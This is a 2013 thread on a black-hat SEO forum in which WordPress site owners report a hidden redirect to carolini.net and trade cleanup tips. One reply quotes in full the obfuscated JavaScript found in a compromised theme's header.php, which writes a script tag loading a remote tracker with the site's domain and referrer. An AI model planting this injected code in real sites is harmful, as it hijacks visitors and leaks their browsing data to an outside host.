1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

To: Owner of carolini.net - You're a dickhead

Discussion in 'Black Hat SEO' started by rasmusk, Jan 19, 2013.

  1. rasmusk

    rasmusk Senior Member

    Joined:
    Oct 4, 2012
    Messages:
    905
    Likes Received:
    362
    Occupation:
    Bypassing IRA
    Location:
    Cayman Islands
    Who'ever det owner of carolini . net is - Youre a dickhead. I've spent thousands of hours getting content on my authority site and earning more than 50 USD a day.

    I wondered why statistics was fucked up.. Now I know why.

    Someone installed a script on my website, redirecting people to carolini.net(which redirects twice). The sick thing of this script is, that it only does it after 5-15 clicks in a random interval, so the webmaster(me) wont find out so easy.

    Seriously? I need help to get this fixed. I will pay trough moneybookers to cleanse this from all my wordpress sites. Also money to get identity of this guy so I can file a police report. Cheers.
     
  2. kvmcable

    kvmcable Supreme Member

    Joined:
    Dec 28, 2010
    Messages:
    1,355
    Likes Received:
    2,815
    Occupation:
    24 year business owner - old school dude
    Location:
    KFC - BW3
    Replace the header.php file with an original and send me the reward. Good luck

    Ah shit just saw your -7 rep; guess I've been trolled....
     
  3. drkwrld

    drkwrld Regular Member

    Joined:
    Dec 27, 2010
    Messages:
    249
    Likes Received:
    95
    Home Page:
    Oh man im sorry to hear that. U can do a whois on the site just google it up sometimes the owners info comes out. Other than that dont what to tell you buddy. Good luck
     
  4. subster

    subster Elite Member

    Joined:
    Apr 5, 2008
    Messages:
    1,864
    Likes Received:
    1,448
    Location:
    Krauthausen
    i've done that very often and can help you
     
  5. blackberry

    blackberry Power Member

    Joined:
    Apr 26, 2009
    Messages:
    675
    Likes Received:
    218
    Occupation:
    Making money
    Location:
    Planet Earth
    Make sure to replace header.php AND it is important to take a good hard look at your htaccess file too for any sneaky redirects.


     
  6. islandman1010

    islandman1010 Elite Member

    Joined:
    May 10, 2008
    Messages:
    1,593
    Likes Received:
    139
    try using Wordfence plugin. Did a good job on my site
     
  7. ShabbySquire

    ShabbySquire Power Member

    Joined:
    Nov 30, 2011
    Messages:
    574
    Likes Received:
    122
    Location:
    UK
    Premium or free version?
     
  8. rodol

    rodol Regular Member

    Joined:
    Mar 10, 2010
    Messages:
    346
    Likes Received:
    67
    Location:
    Earth
    if you are using shared hosting go private or change hosting.
     
  9. deesonarnibal

    deesonarnibal Newbie

    Joined:
    Apr 18, 2012
    Messages:
    31
    Likes Received:
    2
    Occupation:
    SEO Specialist
    Location:
    Mango Tree
    does anybody here has a solution to this problem? I always got this carolini.net about 2 times this day on my site! This gets frustrating!
     
  10. saber210

    saber210 Supreme Member

    Joined:
    Sep 1, 2011
    Messages:
    1,358
    Likes Received:
    500
    Location:
    -
    What theme are you using? is your theme nulled?

    check your header and footer for encrypted code.

    Also check your htaccess and ask help on your to see if you are the only one affected.
     
  11. pxoxrxn

    pxoxrxn Supreme Member

    Joined:
    Dec 21, 2011
    Messages:
    1,397
    Likes Received:
    2,066
    Who is your host? A clients website is with hostgator and they got a malicious plugin installed on their wp site, HG emailed me straight away and said they removed it. Pretty good service
     
  12. deesonarnibal

    deesonarnibal Newbie

    Joined:
    Apr 18, 2012
    Messages:
    31
    Likes Received:
    2
    Occupation:
    SEO Specialist
    Location:
    Mango Tree
    saber: Yes, I got this Current theme from wootheme.
    pxoxrxn: Thanks for the heads up.
     
  13. deesonarnibal

    deesonarnibal Newbie

    Joined:
    Apr 18, 2012
    Messages:
    31
    Likes Received:
    2
    Occupation:
    SEO Specialist
    Location:
    Mango Tree
    Anyway, on the header.php, how can I locate the code of the redirection script?
     
  14. deesonarnibal

    deesonarnibal Newbie

    Joined:
    Apr 18, 2012
    Messages:
    31
    Likes Received:
    2
    Occupation:
    SEO Specialist
    Location:
    Mango Tree
    Figured it out. The header.php got malicious script on it.
    Code:
    <script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
     
  15. powlow29

    powlow29 Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 18, 2009
    Messages:
    774
    Likes Received:
    667
  16. saber210

    saber210 Supreme Member

    Joined:
    Sep 1, 2011
    Messages:
    1,358
    Likes Received:
    500
    Location:
    -
    My advice is to remove your theme completely.. then download a clean one. I prefer to scan the theme with exploitscanner on WP and then scan it using TAC.
     
  17. SEO_Alchemy

    SEO_Alchemy Senior Member

    Joined:
    Sep 8, 2012
    Messages:
    1,134
    Likes Received:
    1,213
    Location:
    USA
    A caution to all who download "free/cracked" themes. Got a dodgy plug-in that tried to do the same thing before. Luckily noticed pretty soon afterwards, but just goes to show...
     
  18. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,066
    Likes Received:
    2,872
    Gender:
    Male
    I can nullify your theme completely so that you don't have to face the trouble again. I won't do that for free :p
    PM me if you need it :)
     
  19. panda23

    panda23 Regular Member

    Joined:
    Apr 10, 2012
    Messages:
    230
    Likes Received:
    112
    Occupation:
    Self-Employed
    Location:
    Hawaii
    Run a malware scan and detect where the hidden script is. Go and remove it manually and you are done.
     
  20. jameshilton105

    jameshilton105 BANNED BANNED

    Joined:
    Feb 17, 2012
    Messages:
    215
    Likes Received:
    83
    Oh dude! OP and this dude: http://www.blackhatworld.com/blackhat-seo/members/304244-deesonarnibal.html is the same guy? How will you ever learn not to own more than 1 account or at least don't be caught!

    Commenting on your own thread - being a dickhead!... And next what? Faking your iTrader score?

    I see the mighty Ban Hammer of Thor coming your way!
     
    Last edited: Jan 23, 2013